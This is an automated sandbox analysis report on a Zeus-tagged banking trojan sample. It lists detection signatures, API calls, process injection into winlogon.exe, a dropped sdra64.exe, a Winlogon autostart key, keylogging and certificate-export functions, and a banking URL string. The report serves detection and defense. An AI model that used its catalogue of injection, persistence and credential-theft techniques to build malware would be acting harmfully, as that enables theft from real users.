Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report P8jE8nmN7G

Overview

General Information

Sample Name:P8jE8nmN7G (renamed file extension from none to exe)
Analysis ID:409287
MD5:ac514dce9416eb9e4148431016629174
SHA1:b0e1d96605cdc3da995a667a1fdc7189b67bfdcd
SHA256:67334c1b7f629c04efefbfb466e5996a425af4a43c07a5ce51d4f142222b0de7
Tags:zeus1
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains VNC / remote desktop functionality (version string found)
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • P8jE8nmN7G.exe (PID: 4860 cmdline: 'C:\Users\user\Desktop\P8jE8nmN7G.exe' MD5: AC514DCE9416EB9E4148431016629174)
    • winlogon.exe (PID: 560 cmdline: MD5: F9017F2DC455AD373DF036F5817A8870)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
Source: Process startedAuthor: vburov: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\winlogon.exe, NewProcessName: C:\Windows\System32\winlogon.exe, OriginalFileName: C:\Windows\System32\winlogon.exe, ParentCommandLine: 'C:\Users\user\Desktop\P8jE8nmN7G.exe' , ParentImage: C:\Users\user\Desktop\P8jE8nmN7G.exe, ParentProcessId: 4860, ProcessCommandLine: , ProcessId: 560

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: P8jE8nmN7G.exeAvira: detected
Antivirus detection for dropped fileShow sources
Source: C:\Windows\SysWOW64\sdra64.exeAvira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for submitted fileShow sources
Source: P8jE8nmN7G.exeVirustotal: Detection: 80%Perma Link
Source: P8jE8nmN7G.exeReversingLabs: Detection: 96%
Machine Learning detection for dropped fileShow sources
Source: C:\Windows\SysWOW64\sdra64.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: P8jE8nmN7G.exeJoe Sandbox ML: detected
Source: 0.1.P8jE8nmN7G.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
Source: 0.0.P8jE8nmN7G.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004100F6 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_004100F6
Source: P8jE8nmN7G.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040C174 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,0_2_0040C174
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00411D26 PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose,0_2_00411D26
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004079FA ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose,0_2_004079FA
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00415582 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW,0_2_00415582
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00404AB1 PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose,0_2_00404AB1
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004104CA select,recv,0_2_004104CA
Source: P8jE8nmN7G.exe, 00000000.00000002.464936104.0000000002563000.00000004.00000040.sdmpString found in binary or memory: https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00405F48 GetClipboardData,GlobalFix,GlobalUnWire,0_2_00405F48
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004060AA GetTickCount,GetCurrentProcessId,wnsprintfW,GetKeyState,GetKeyState,GetKeyboardState,ToUnicode,WideCharToMultiByte,0_2_004060AA
Source: P8jE8nmN7G.exe, 00000000.00000002.464351346.000000000072A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00414119 OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,0_2_00414119
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00405C8F NtQueryDirectoryFile,NtQueryObject,lstrcmpiW,0_2_00405C8F
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004096D8 NtdllDefWindowProc_A,0_2_004096D8
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004076BC NtQueryInformationProcess,CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,NtCreateThread,0_2_004076BC
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040B798 CreateFileW,NtQueryObject,lstrcpyW,CloseHandle,0_2_0040B798
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040BDF2 GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,GetForegroundWindow,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateTokenEx,LoadLibraryA,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,0_2_0040BDF2
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040C268 ExitWindowsEx,0_2_0040C268
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004100030_2_00410003
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004102DA0_2_004102DA
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004137580_2_00413758
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_005517380_2_00551738
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeSection loaded: ntmarta.dllJump to behavior
Source: P8jE8nmN7G.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: P8jE8nmN7G.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sdra64.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@0/0
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004046EE CertOpenSystemStoreW,PFXExportCertStore,PFXExportCertStore,GetSystemTime,wnsprintfW,CertDuplicateCertificateContext,CertDeleteCRLFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_004046EE
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0041158D OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,0_2_0041158D
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004061FF CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,FindCloseChangeNotification,0_2_004061FF
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMutant created: \Sessions\1\BaseNamedObjects\_AVIRA_21099
Source: P8jE8nmN7G.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: P8jE8nmN7G.exeVirustotal: Detection: 80%
Source: P8jE8nmN7G.exeReversingLabs: Detection: 96%
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeFile read: C:\Users\user\Desktop\P8jE8nmN7G.exeJump to behavior

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeUnpacked PE file: 0.2.P8jE8nmN7G.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.data:W;.reloc:R;.data1:W;
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040B4E1 LoadLibraryA,GetProcAddress,0_2_0040B4E1
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00551615 push edi; ret 0_2_0055161C
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_005519C3 pushad ; retf 0_2_005519C4
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_005513FB push edi; iretd 0_2_00551405
Source: initial sampleStatic PE information: section name: .text entropy: 7.22037238545
Source: initial sampleStatic PE information: section name: .text entropy: 7.22037238545
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to dropped file
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040970D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadCursorW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,0_2_0040970D
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeDropped PE file which has not been started: C:\Windows\SysWOW64\sdra64.exeJump to dropped file
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe TID: 4896Thread sleep count: 209 > 30Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040C174 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,0_2_0040C174
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00411D26 PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose,0_2_00411D26
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_004079FA ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose,0_2_004079FA
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00415582 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW,0_2_00415582
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00404AB1 PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose,0_2_00404AB1
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_00405B6F LdrGetProcedureAddress,0_2_00405B6F
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040B4E1 LoadLibraryA,GetProcAddress,0_2_0040B4E1
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeCode function: 0_2_0040B585 HeapCreate,GetProcessHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW,0_2_0040B585
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 400000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 400000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 401000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 416000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 419000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 41B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C940000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C940000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C941000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C956000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C959000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C95B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C960000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C960000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C961000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C976000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C979000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C97B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C980000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C980000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C981000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C996000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C999000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C99B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9B9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9BB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9D9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9DB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9F9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9FB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CABB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAD9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CADB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB40000 protect: page no accessJump to behavior
